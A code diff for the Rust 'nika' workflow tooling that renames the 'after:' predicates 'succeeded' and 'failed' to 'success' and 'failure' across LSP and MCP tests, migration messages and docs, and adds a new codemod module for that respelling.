+    let text = "nika: v1\nworkflow:\n  id: w\ntasks:\n  cached:\n    exec: { command: [\"echo\", \"fallback\"] }\n  live:\n    exec:\n      command: [\"false\"]\n    on_error:\n      recover: \"${{ tasks.cached.output }}\"\n  downstream:\n    after: { live: success }\n    exec: { command: [\"x\"] }\n";
     let cursor = text.find("${{ tasks.").expect("island") + "${{ tasks.".len();
     let items = completion(text, cursor);
     assert_eq!(
@@ -844,7 +844,7 @@ fn recover_island_offers_the_dag004_legal_set() {
 /// task is legal there (probed green at the binary).
 #[test]
 fn outputs_island_offers_every_task() {
-    let text = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    exec: { command: [\"x\"] }\n  b:\n    after: { a: succeeded }\n    exec: { command: [\"y\"] }\noutputs:\n  first: \"${{ tasks.";
+    let text = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    exec: { command: [\"x\"] }\n  b:\n    after: { a: success }\n    exec: { command: [\"y\"] }\noutputs:\n  first: \"${{ tasks.";
     let got = labels(&completion(text, text.len()));
     assert_eq!(got, vec!["a", "b"], "outside a task, all ids: {got:?}");
 }
@@ -982,7 +982,7 @@ fn task_fields_survive_outside_schema() {
 /// (so the doc PARSES and the island lanes ride the parse path; the
 /// cursor sits just after `for_each: ` where the typed prefix is still
 /// the empty-value position).
-const FLOW_DOC: &str = "nika: v1\nworkflow:\n  id: w\ninputs:\n  urls:\n    type: { array: string }\n    default: []\n  topic: { type: string, default: \"rust\" }\ntasks:\n  gather:\n    exec:\n      command: [\"ls\"]\n  fan:\n    after: { gather: succeeded }\n    for_each: \"${{ inputs.urls }}\"\n    exec:\n      command: [\"echo\"]\n  last:\n    after: { fan: succeeded }\n    exec:\n      command: [\"true\"]\n";
+const FLOW_DOC: &str = "nika: v1\nworkflow:\n  id: w\ninputs:\n  urls:\n    type: { array: string }\n    default: []\n  topic: { type: string, default: \"rust\" }\ntasks:\n  gather:\n    exec:\n      command: [\"ls\"]\n  fan:\n    after: { gather: success }\n    for_each: \"${{ inputs.urls }}\"\n    exec:\n      command: [\"echo\"]\n  last:\n    after: { fan: success }\n    exec:\n      command: [\"true\"]\n";
 
 #[test]
 fn for_each_offers_typed_arrays_first_then_the_boundary_import() {
@@ -1019,7 +1019,7 @@ fn for_each_offers_typed_arrays_first_then_the_boundary_import() {
     // Once the task DECLARES the binding, the same label rides as the
     // binding itself (the boundary import), not the teaching.
     let bound = FLOW_DOC.replace(
-        "    after: { gather: succeeded }\n",
+        "    after: { gather: success }\n",
         "    with:\n      items: \"${{ tasks.gather.output }}\"\n",
     );
     let at2 = bound.find("for_each: ").expect("key") + "for_each: ".len();
@@ -1042,7 +1042,7 @@ fn when_composes_the_cel_shapes_from_the_document() {
     // No tasks.* form appears (status gating lives in `after:`).
     let doc = FLOW_DOC
         .replace(
-            "    after: { gather: succeeded }\n",
+            "    after: { gather: success }\n",
             "    with:\n      items: \"${{ tasks.gather.output }}\"\n",
         )
         .replace(
@@ -1162,7 +1162,7 @@ fn free_form_maps_stay_free() {
 /// `with` is task-local, another task's aliases are out of scope.
 #[test]
 fn with_island_offers_the_enclosing_tasks_aliases() {
-    let text = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    with:\n      other: 1\n    exec: { command: [\"x\"] }\n  b:\n    after: { a: succeeded }\n    with:\n      article: \"${{ tasks.a.output }}\"\n      limit: 5\n    exec: { command: [\"echo\", \"${{ with.article }}\", \"${{ with.\"] }\n";
+    let text = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    with:\n      other: 1\n    exec: { command: [\"x\"] }\n  b:\n    after: { a: success }\n    with:\n      article: \"${{ tasks.a.output }}\"\n      limit: 5\n    exec: { command: [\"echo\", \"${{ with.article }}\", \"${{ with.\"] }\n";
     let cursor = text.rfind("${{ with.").expect("island") + "${{ with.".len();
     let got = labels(&completion(text, cursor));
     assert_eq!(

--- a/crates/nika-lsp/src/analysis/definition.rs
+++ b/crates/nika-lsp/src/analysis/definition.rs
@@ -6,7 +6,7 @@
 //! When the cursor sits on a task REFERENCE, jump to the task DEFINITION
 //! (its `id`). Two reference shapes are resolved in v0.1 ·
 //!
-//! 1. an `after:` target (`after: { extract: succeeded }` → the `extract`
+//! 1. an `after:` target (`after: { extract: success }` → the `extract`
 //!    task's id), resolved from the parser's own item spans.
 //! 2. a `tasks.<id>` chain inside a `${{ … }}` island (`${{
 //!    tasks.extract.output.summary }}` → the `extract` task's id),
@@ -475,7 +475,7 @@ mod tests {
 
     #[test]
     fn after_target_resolves_to_the_exact_full_id_range() {
-        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  extract:\n    exec: { command: [\"x\"] }\n  save:\n    after: { extract: succeeded }\n    exec: { command: [\"y\"] }\n";
+        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  extract:\n    exec: { command: [\"x\"] }\n  save:\n    after: { extract: success }\n    exec: { command: [\"y\"] }\n";
         // cursor on the `extract` target inside the after: map
         let dep_offset = yaml.rfind("extract").expect("after target") + 1;
         let loc = definition(&uri(), yaml, dep_offset).expect("resolves");
@@ -500,7 +500,7 @@ mod tests {
         // cursor resolves on the FIRST byte through the LAST byte of
         // `extract`, but NOT on the space one byte before nor the `:` one
         // byte after.
-        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  extract:\n    exec: { command: [\"x\"] }\n  save:\n    after: { extract: succeeded }\n    exec: { command: [\"y\"] }\n";
+        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  extract:\n    exec: { command: [\"x\"] }\n  save:\n    after: { extract: success }\n    exec: { command: [\"y\"] }\n";
         let tok = yaml.rfind("extract").expect("after target");
         // one byte BEFORE the token (the space after `{`): no resolution.
         assert!(
@@ -647,7 +647,7 @@ mod tests {
     #[test]
     fn ref_to_undefined_task_returns_none() {
         // an `after:` entry naming a ghost — no id span to jump to
-        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { ghost: succeeded }\n    exec: { command: [\"x\"] }\n";
+        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { ghost: success }\n    exec: { command: [\"x\"] }\n";
         let ghost_at = yaml.find("ghost").expect("ref") + 1;
         assert!(definition(&uri(), yaml, ghost_at).is_none());
     }

--- a/crates/nika-lsp/src/analysis/diagnostics.rs
+++ b/crates/nika-lsp/src/analysis/diagnostics.rs
@@ -427,7 +427,7 @@ mod tests {
     fn unknown_dep_yields_dag002_error_with_span() {
         // an `after:` entry naming a ghost task — NIKA-DAG-002, carries
         // a span on the target token.
-        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { ghost: succeeded }\n    exec: { command: [\"x\"] }\n";
+        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { ghost: success }\n    exec: { command: [\"x\"] }\n";
         let diags = diags_of(yaml);
         let dag = diags
             .iter()

--- a/crates/nika-lsp/src/analysis/graph.rs
+++ b/crates/nika-lsp/src/analysis/graph.rs
@@ -61,7 +61,7 @@ mod tests {
     // the diamond: a → {b, c} → d (control edges via `after:` — the
     // W2 boundary; `producer_ids` reads the same derived edge set for
     // `with:` refs too)
-    const DIAMOND: &str = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    exec: { command: [\"x\"] }\n  b:\n    after: { a: succeeded }\n    exec: { command: [\"x\"] }\n  c:\n    after: { a: succeeded }\n    exec: { command: [\"x\"] }\n  d:\n    after: { b: succeeded, c: succeeded }\n    exec: { command: [\"x\"] }\n";
+    const DIAMOND: &str = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    exec: { command: [\"x\"] }\n  b:\n    after: { a: success }\n    exec: { command: [\"x\"] }\n  c:\n    after: { a: success }\n    exec: { command: [\"x\"] }\n  d:\n    after: { b: success, c: success }\n    exec: { command: [\"x\"] }\n";
 
     #[test]
     fn downstream_of_the_root_is_everything_else() {

--- a/crates/nika-lsp/src/analysis/hover.rs
+++ b/crates/nika-lsp/src/analysis/hover.rs
@@ -499,7 +499,7 @@ mod tests {
 
     #[test]
     fn hover_on_after_target_shows_target_task_and_verb() {
-        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  greet:\n    infer: { prompt: \"hi\", max_tokens: 5 }\n  use_it:\n    after: { greet: succeeded }\n    exec: { command: [\"x\"] }\n";
+        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  greet:\n    infer: { prompt: \"hi\", max_tokens: 5 }\n  use_it:\n    after: { greet: success }\n    exec: { command: [\"x\"] }\n";
         // the LAST `greet` is the after: target (the first is the id)
         let at = yaml.rfind("greet").expect("after target") + 1;
         let h = hover(yaml, at).expect("hover on the reference");
@@ -663,7 +663,7 @@ mod tests {
     /// producer WITH its role.
     #[test]
     fn hover_on_task_decl_shows_the_dag_card() {
-        let text = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    exec: { command: [\"x\"] }\n  b:\n    with:\n      data: \"${{ tasks.a.output }}\"\n    exec: { command: [\"x\"] }\n  c:\n    after: { a: succeeded }\n    exec: { command: [\"x\"] }\n  d:\n    after: { b: succeeded, c: terminal }\n    exec: { command: [\"x\"] }\n";
+        let text = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    exec: { command: [\"x\"] }\n  b:\n    with:\n      data: \"${{ tasks.a.output }}\"\n    exec: { command: [\"x\"] }\n  c:\n    after: { a: success }\n    exec: { command: [\"x\"] }\n  d:\n    after: { b: success, c: terminal }\n    exec: { command: [\"x\"] }\n";
         let a = hover(text, text.find("\n  a:").expect("a") + 3).expect("card for a");
         let ab = body(&a);
         assert!(ab.contains("wave 1/3"), "{ab}");
@@ -688,7 +688,7 @@ mod tests {
         let db = body(&d);
         assert!(db.contains("wave 3/3"), "{db}");
         assert!(
-            db.contains("waits on: `b` (control · succeeded), `c` (control · terminal)"),
+            db.contains("waits on: `b` (control · success), `c` (control · terminal)"),
             "control edges carry their predicate: {db}"
         );
         assert!(db.contains("terminal task"), "{db}");
@@ -698,7 +698,7 @@ mod tests {
     /// lane already tells that story with a span and a code.
     #[test]
     fn hover_on_task_decl_in_a_cycle_stays_silent() {
-        let text = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { b: succeeded }\n    exec: { command: [\"x\"] }\n  b:\n    after: { a: succeeded }\n    exec: { command: [\"x\"] }\n";
+        let text = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { b: success }\n    exec: { command: [\"x\"] }\n  b:\n    after: { a: success }\n    exec: { command: [\"x\"] }\n";
         assert!(hover(text, text.find("\n  a:").expect("a") + 3).is_none());
     }
 

--- a/crates/nika-lsp/src/analysis/rename.rs
+++ b/crates/nika-lsp/src/analysis/rename.rs
@@ -253,7 +253,7 @@ mod tests {
     /// The W2 fixture — `fetch` is spoken at FIVE sites: its key, two
     /// `after:` entries (digest's + save's) and two `${{ tasks.fetch }}`
     /// islands (both inside `with:` binding values, the boundary form).
-    const DOC: &str = "nika: v1\nworkflow:\n  id: w\ntasks:\n  fetch:\n    exec: { command: [\"curl\"] }\n  digest:\n    after: { fetch: succeeded }\n    with:\n      article: \"${{ tasks.fetch.output }}\"\n    infer: { prompt: \"sum ${{ with.article }}\", max_tokens: 10 }\n  save:\n    after: { digest: succeeded, fetch: terminal }\n    with:\n      doc: \"${{ tasks.digest.output }}\"\n      raw: \"${{ tasks.fetch.output }}\"\n    exec: { command: [\"tee\", \"${{ with.doc }}\", \"${{ with.raw }}\"] }\n";
+    const DOC: &str = "nika: v1\nworkflow:\n  id: w\ntasks:\n  fetch:\n    exec: { command: [\"curl\"] }\n  digest:\n    after: { fetch: success }\n    with:\n      article: \"${{ tasks.fetch.output }}\"\n    infer: { prompt: \"sum ${{ with.article }}\", max_tokens: 10 }\n  save:\n    after: { digest: success, fetch: terminal }\n    with:\n      doc: \"${{ tasks.digest.output }}\"\n      raw: \"${{ tasks.fetch.output }}\"\n    exec: { command: [\"tee\", \"${{ with.doc }}\", \"${{ with.raw }}\"] }\n";
 
     fn uri() -> Uri {
         Uri::from_str("file:///w.nika.yaml").expect("uri")
@@ -298,11 +298,11 @@ mod tests {
         assert!(!after.contains("fetch"), "no site left behind: {after}");
         assert!(after.contains("\n  pull:"), "the key moved");
         assert!(
-            after.contains("after: { pull: succeeded }"),
+            after.contains("after: { pull: success }"),
             "digest's control entry moved"
         );
         assert!(
-            after.contains("after: { digest: succeeded, pull: terminal }"),
+            after.contains("after: { digest: success, pull: terminal }"),
             "save's control entry moved (the predicate untouched)"
         );
         assert!(
@@ -323,7 +323,7 @@ mod tests {
             apply(DOC, edits(&rename(&uri(), DOC, at, "pull").expect("ok")))
         };
         let from_after = {
-            let at = DOC.find("{ fetch: succeeded }").expect("after entry") + 2;
+            let at = DOC.find("{ fetch: success }").expect("after entry") + 2;
             apply(DOC, edits(&rename(&uri(), DOC, at, "pull").expect("ok")))
         };
         let from_ref = {
@@ -351,7 +351,7 @@ mod tests {
         );
         // a ghost after: site — rename refuses (rename the definition,
         // not a ghost)
-        let ghost_doc = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { ghost: succeeded }\n    exec: { command: [\"x\"] }\n";
+        let ghost_doc = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { ghost: success }\n    exec: { command: [\"x\"] }\n";
         let at = ghost_doc.find("ghost").expect("ghost") + 1;
         assert!(
             rename(&uri(), ghost_doc, at, "real")
@@ -375,7 +375,7 @@ mod tests {
         );
         // after: entry site
         let dep_at = DOC
-            .find("{ digest: succeeded, fetch: terminal }")
+            .find("{ digest: success, fetch: terminal }")
             .expect("after")
             + 2;
         assert_eq!(prepare(DOC, dep_at).expect("after prepares").1, "digest");
@@ -394,13 +394,13 @@ mod tests {
     fn verb_named_task_renames_only_identity_sites() {
         // a task NAMED `invoke` (the census trap): the verb KEY of another
         // task must not be touched — only identity sites move.
-        let doc = "nika: v1\nworkflow:\n  id: w\ntasks:\n  invoke:\n    exec: { command: [\"x\"] }\n  b:\n    after: { invoke: succeeded }\n    with:\n      path: \"${{ tasks.invoke.output }}\"\n    invoke:\n      tool: \"nika:read\"\n      args: { path: \"${{ with.path }}\" }\n";
+        let doc = "nika: v1\nworkflow:\n  id: w\ntasks:\n  invoke:\n    exec: { command: [\"x\"] }\n  b:\n    after: { invoke: success }\n    with:\n      path: \"${{ tasks.invoke.output }}\"\n    invoke:\n      tool: \"nika:read\"\n      args: { path: \"${{ with.path }}\" }\n";
         let at = doc.find("\n  invoke:").expect("key") + 3;
         let we = rename(&uri(), doc, at, "caller").expect("renames");
         let after = apply(doc, edits(&we));
         assert!(after.contains("\n  caller:"), "identity key moved");
         assert!(
-            after.contains("after: { caller: succeeded }"),
+            after.contains("after: { caller: success }"),
             "control entry moved"
         );
         assert!(after.contains("tasks.caller.output"), "ref moved");

--- a/crates/nika-lsp/src/analysis/semantic_document.rs
+++ b/crates/nika-lsp/src/analysis/semantic_document.rs
@@ -110,7 +110,7 @@ pub fn semantic_document(text: &str) -> SemanticDocument {
 mod tests {
     use super::*;
 
-    const DIAMOND: &str = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    exec: { command: [\"true\"] }\n  c:\n    after: { a: succeeded }\n    exec: { command: [\"true\"] }\n  d:\n    after: { b: succeeded, c: succeeded }\n    exec: { command: [\"true\"] }\n";
+    const DIAMOND: &str = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    exec: { command: [\"true\"] }\n  c:\n    after: { a: success }\n    exec: { command: [\"true\"] }\n  d:\n    after: { b: success, c: success }\n    exec: { command: [\"true\"] }\n";
 
     fn as_value(doc: &SemanticDocument) -> serde_json::Value {
         serde_json::to_value(doc).expect("payload serializes")
@@ -146,7 +146,7 @@ mod tests {
         );
         assert_eq!(ok["graph"]["graph_format"], 2, "the nested graph's version");
         // absent-graph cases still name the surface version (findings · parse)
-        let findings = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { b: succeeded }\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    exec: { command: [\"true\"] }\n";
+        let findings = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { b: success }\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    exec: { command: [\"true\"] }\n";
         assert_eq!(
             as_value(&semantic_document(findings))["semantic_document_format"],
             1
@@ -174,7 +174,7 @@ mod tests {
     /// spans it could read.
     #[test]
     fn findings_yield_a_null_graph_not_an_error() {
-        let cyclic = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { b: succeeded }\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    exec: { command: [\"true\"] }\n";
+        let cyclic = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { b: success }\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    exec: { command: [\"true\"] }\n";
         let doc = as_value(&semantic_document(cyclic));
         assert_eq!(doc["graph"], serde_json::Value::Null);
         assert_eq!(doc["reason"], "findings", "why, in one word");

--- a/crates/nika-lsp/src/analysis/symbols.rs
+++ b/crates/nika-lsp/src/analysis/symbols.rs
@@ -241,7 +241,7 @@ mod tests {
 
     #[test]
     fn each_task_is_a_child_detailed_with_its_verb() {
-        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  fetch_it:\n    invoke: { tool: \"nika:read\", args: { path: \"./x\" } }\n  think:\n    after: { fetch_it: succeeded }\n    infer: { prompt: \"hi\", max_tokens: 10 }\n";
+        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  fetch_it:\n    invoke: { tool: \"nika:read\", args: { path: \"./x\" } }\n  think:\n    after: { fetch_it: success }\n    infer: { prompt: \"hi\", max_tokens: 10 }\n";
         let syms = document_symbols(yaml);
         let children = syms[0].children.as_ref().expect("children present");
         assert_eq!(children.len(), 2, "two tasks");

--- a/crates/nika-lsp/src/analysis/vocab.rs
+++ b/crates/nika-lsp/src/analysis/vocab.rs
@@ -113,7 +113,7 @@ pub const TASK_FIELD_KEYS: &[Entry] = &[
     Entry {
         name: "after",
         doc: "The CONTROL boundary — `{producer: predicate}` map; each \
-              entry is one control edge (succeeded · failed · skipped · \
+              entry is one control edge (success · failure · skipped · \
               terminal).",
     },
     Entry {

--- a/crates/nika-lsp/src/server.rs
+++ b/crates/nika-lsp/src/server.rs
@@ -554,7 +554,7 @@ mod tests {
     #[test]
     fn diagnose_broken_workflow_yields_an_error() {
         let doc = Document::new(
-            "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { ghost: succeeded }\n    exec: { command: [\"x\"] }\n",
+            "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { ghost: success }\n    exec: { command: [\"x\"] }\n",
         );
         let diags = diagnose(&doc);
         assert!(
@@ -628,7 +628,7 @@ mod tests {
             "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    exec: { command: [\"x\"] }\n",
         );
         // change to a BROKEN workflow (waits on a ghost) → an error diag.
-        let broken = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { ghost: succeeded }\n    exec: { command: [\"x\"] }\n";
+        let broken = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { ghost: success }\n    exec: { command: [\"x\"] }\n";
         handle_notification(&server, change_note(broken), &mut docs).expect("handled");
         assert_eq!(
             docs.get(uri_key(&uri())).map(Document::text),
@@ -986,12 +986,12 @@ mod canary {
             .expect("initialized");
 
         // 1) A broken workflow → a NIKA-* error diagnostic published.
-        let broken = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { ghost: succeeded }\n    exec: { command: [\"x\"] }\n";
+        let broken = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after: { ghost: success }\n    exec: { command: [\"x\"] }\n";
         did_open(&client, broken);
 
         // 2) A clean workflow with a verb, an `after:` entry and a
         //    template ref riding a `with:` binding (the W2 doors).
-        let hello = "nika: v1\nworkflow:\n  id: hello\ntasks:\n  greet:\n    infer: { prompt: \"hi\", max_tokens: 10 }\n  use_it:\n    after: { greet: succeeded }\n    with:\n      msg: \"${{ tasks.greet.output }}\"\n    exec: { command: [\"echo\", \"${{ with.msg }}\"] }\n";
+        let hello = "nika: v1\nworkflow:\n  id: hello\ntasks:\n  greet:\n    infer: { prompt: \"hi\", max_tokens: 10 }\n  use_it:\n    after: { greet: success }\n    with:\n      msg: \"${{ tasks.greet.output }}\"\n    exec: { command: [\"echo\", \"${{ with.msg }}\"] }\n";
         let hello_uri = Uri::from_str("file:///hello.nika.yaml").expect("uri");
         open_uri(&client, &hello_uri, hello);
         let idx = crate::analysis::position::LineIndex::new(hello);

--- a/crates/nika-mcp/src/protocol.rs
+++ b/crates/nika-mcp/src/protocol.rs
@@ -238,7 +238,7 @@ mod tests {
         // A workflow with findings comes back isError:true (the model
         // sees the findings AND a repair-on-error harness fires) — the
         // MCP lane must agree with the CLI's exit-2-on-dirty.
-        let wf = "nika: v1\nworkflow:\n  id: t\ntasks:\n  a:\n    after:\n      ghost: succeeded\n    exec: { command: [\"x\"] }\n";
+        let wf = "nika: v1\nworkflow:\n  id: t\ntasks:\n  a:\n    after:\n      ghost: success\n    exec: { command: [\"x\"] }\n";
         let resp = handle(&json!({
             "jsonrpc": "2.0", "id": 7, "method": "tools/call",
             "params": { "name": "nika_check", "arguments": { "workflow": wf } }

--- a/crates/nika-mcp/src/tools.rs
+++ b/crates/nika-mcp/src/tools.rs
@@ -359,7 +359,7 @@ mod tests {
     /// protocols: this pin is the MCP leg of the LSP's parity law).
     #[test]
     fn inspect_serves_the_canonical_projection_verbatim() {
-        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    exec: { command: [\"true\"] }\n  b:\n    after:\n      a: succeeded\n    exec: { command: [\"true\"] }\n";
+        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    exec: { command: [\"true\"] }\n  b:\n    after:\n      a: success\n    exec: { command: [\"true\"] }\n";
         let out = inspect(&serde_json::json!({ "workflow": yaml })).expect("clean");
         let got: Value = serde_json::from_str(&out).expect("json");
         let wf = nika_schema::parse(
@@ -378,7 +378,7 @@ mod tests {
     /// MCP leg) — never a projection of an unproven DAG.
     #[test]
     fn inspect_refuses_findings_with_a_reason() {
-        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after:\n      b: succeeded\n    exec: { command: [\"true\"] }\n  b:\n    after:\n      a: succeeded\n    exec: { command: [\"true\"] }\n";
+        let yaml = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    after:\n      b: success\n    exec: { command: [\"true\"] }\n  b:\n    after:\n      a: success\n    exec: { command: [\"true\"] }\n";
         let out = inspect(&serde_json::json!({ "workflow": yaml })).expect("answers");
         let got: Value = serde_json::from_str(&out).expect("json");
         assert_eq!(got["graph"], Value::Null);
@@ -477,7 +477,7 @@ mod tests {
         // Dirty is an `Err` (→ isError:true) so a wired agent's repair
         // loop triggers, mirroring the CLI's exit-2-on-dirty; the full
         // report still rides the text so the model repairs from it.
-        let wf = "nika: v1\nworkflow:\n  id: t\ntasks:\n  a:\n    after:\n      ghost: succeeded\n    exec: { command: [\"x\"] }\n";
+        let wf = "nika: v1\nworkflow:\n  id: t\ntasks:\n  a:\n    after:\n      ghost: success\n    exec: { command: [\"x\"] }\n";
         let err = execute("nika_check", &json!({ "workflow": wf })).expect_err("dirty is an error");
         assert!(err.contains("findings") && err.contains("NIKA-"), "{err}");
     }

--- a/crates/nika-migrate/public-api.txt
+++ b/crates/nika-migrate/public-api.txt
@@ -45,5 +45,6 @@ pub fn nika_migrate::W2Outcome::borrow_mut(&mut self) -> &mut T
 impl<T> core::convert::From<T> for nika_migrate::W2Outcome
 pub fn nika_migrate::W2Outcome::from(t: T) -> T
 pub fn nika_migrate::esplit(source: &str) -> nika_migrate::EsplitOutcome
+pub fn nika_migrate::predicates(source: &str) -> core::option::Option<alloc::string::String>
 pub fn nika_migrate::w1(source: &str) -> core::option::Option<alloc::string::String>
 pub fn nika_migrate::w2(source: &str) -> nika_migrate::W2Outcome

--- a/crates/nika-migrate/src/lib.rs
+++ b/crates/nika-migrate/src/lib.rs
@@ -21,13 +21,15 @@
 //! handled — the parser's teaching names the file and a human decides
 //! (never guess; the conformance suite pins the refusal).
 //!
-//! The crate carries three waves — `w1` (the map), `w2` (equivalence-or-stop
-//! flow migration) and [`esplit()`](fn@esplit) (the C2 four-authority
-//! flag-day). Split out
+//! The crate carries four waves — `w1` (the map), `w2` (equivalence-or-stop
+//! flow migration), [`esplit()`](fn@esplit) (the C2 four-authority
+//! flag-day) and [`predicates()`](fn@predicates) (the R5 outcome-class
+//! respelling). Split out
 //! of `nika-cli` per the size-cap discipline
 //! (D-2026-07-09-N1 · one architectural unit, N workspace members · the
 //! `nika-source` / `nika-vocab` precedent): the CLI's `fix` verb calls
-//! `nika_migrate::w1` / `w2` / `esplit` unchanged. The migrations are
+//! `nika_migrate::w1` / `w2` / `esplit` / `predicates` unchanged. The
+//! migrations are
 //! pure transforms; the `repair` module carries the byte-level mechanics
 //! of applying them (whole-word splice · atomic publish · `std` only).
 //! Zero deps.
@@ -44,9 +46,11 @@
 )]
 
 mod esplit;
+mod predicates;
 pub mod repair;
 
 pub use esplit::{EsplitOutcome, esplit};
+pub use predicates::predicates;
 
 /// Apply the W1 migration. `Some(new)` when the document changed,
 /// `None` when it is already in the new form (idempotence by contract).
@@ -170,7 +174,7 @@ fn task_item_to_key(line: &str) -> Option<String> {
 //       path moves its eval outside `on_error:` armor → GO only without
 //       armor.
 //   R2  a bare (unreferenced) dep whose producer provably CANNOT skip
-//       (no when: · no on_error.skip · no for_each) → `after: {d: succeeded}`.
+//       (no when: · no on_error.skip · no for_each) → `after: {d: success}`.
 //   R3  a dep already read through `with:` (value-role) simply leaves.
 //
 //   STOP classes: S1 skippable producer on a bare dep · S2 `when:`
@@ -700,7 +704,7 @@ fn scan_task_body(
         if is_when {
             stops.push(format!(
                 "[S2] task `{id}`: when: references tasks.* — pre-W2 it REPLACED \
-                 the gate; candidates: after: {{x: succeeded}} (strict) · \
+                 the gate; candidates: after: {{x: success}} (strict) · \
                  after: {{x: terminal}} + a .status binding (always/branch) · \
                  hoist the value into with: — each changes skipped-vs-cancelled \
                  observability differently; a human picks"
@@ -781,7 +785,7 @@ fn decide_deps(
             stops.push(format!(
                 "[S3] task `{id}`: dep `{d}` is backed only by an observation \
                  reference — the observation edge admits on MORE states than the \
-                 old gate; keep tightness via after: {{{d}: succeeded}} or accept \
+                 old gate; keep tightness via after: {{{d}: success}} or accept \
                  the wider admission by hand"
             ));
             continue;
@@ -789,13 +793,13 @@ fn decide_deps(
         if can_skip.get(d).copied().unwrap_or(false) {
             stops.push(format!(
                 "[S1] task `{id}`: bare dep `{d}` on a producer that may SKIP — \
-                 the old gate ran on skipped; after: {{{d}: succeeded}} cancels \
+                 the old gate ran on skipped; after: {{{d}: success}} cancels \
                  there · after: {{{d}: terminal}} also runs on failure · a value \
                  binding keeps {{success, skipped}} but imports data (W2-Q1)"
             ));
             continue;
         }
-        after_entries.push(format!("      {d}: succeeded"));
+        after_entries.push(format!("      {d}: success"));
     }
     after_entries
 }
@@ -978,5 +982,17 @@ mod tests {
         let old = "nika: v1\nworkflow: t\ntasks:\n  - depends_on: []\n    id: probe\n";
         let new = w1(old).expect("workflow line still migrates");
         assert!(new.contains("    id: probe"), "ambiguous item untouched");
+    }
+
+    #[test]
+    fn w2_emits_the_r5_predicate_spelling() {
+        // The codemod never emits a spelling its own parser refuses —
+        // post-R5 the provably-strict control edge is `after: {d: success}`.
+        let old = "nika: v1\nworkflow: t\ntasks:\n  a:\n    exec:\n      command: [\"true\"]\n  b:\n    depends_on: [a]\n    exec:\n      command: [\"true\"]\n";
+        let W2Outcome::Changed(new) = w2(old) else {
+            panic!("provably-strict control migrates");
+        };
+        assert!(new.contains("    after:\n      a: success\n"), "{new}");
+        assert!(!new.contains("succeeded"), "{new}");
     }
 }

--- a/crates/nika-migrate/src/predicates.rs
+++ b/crates/nika-migrate/src/predicates.rs
@@ -1,0 +1,314 @@
+// SPDX-License-Identifier: AGPL-3.0-or-later
+// Copyright (C) 2024-2026 SuperNovae Studio <contact@supernovae.studio>
+
+//! R5 « the predicates » codemod — `succeeded` → `success` ·
+//! `failed` → `failure` in `after:` blocks (spec #118 ·
+//! LAW-GRAMMAR-0231 · « Codemod 1:1 mécanique » · `skipped`/`terminal`
+//! unchanged).
+//!
+//! Line-based and structure-aware: the flip touches ONLY the `after:`
+//! map's VALUE position — flow style (`after: {a: succeeded}`) and
+//! block style (`after:` plus indented `task: predicate` lines) —
+//! comments, blank lines, `${{ }}` islands (a `when:` status comparison
+//! is the DAG-007 class, never this one) and task KEYS are preserved
+//! byte-for-byte, and the transform is IDEMPOTENT (a post-R5 document
+//! returns `None`). It is the ONE repair `check --fix` applies when the
+//! parser refuses a dead spelling — the old form is repairable, never
+//! executable (there is no legacy parser path).
+//!
+//! Structure guards (the codemod never guesses): an `after:` opener
+//! counts only INSIDE `tasks:` and indented under a task key (a task
+//! literally named `after` or a top-level key never opens a block), a
+//! block entry flips only when the value IS exactly the dead spelling
+//! (bare or quoted, trailing comment preserved), and flow braces are
+//! counted outside quotes so a `}` inside a string never leaks the
+//! flow state into a sibling field.
+
+/// The dead spellings and their R5 respellings (1:1, order-stable).
+const DEAD: [(&str, &str); 2] = [("succeeded", "success"), ("failed", "failure")];
+
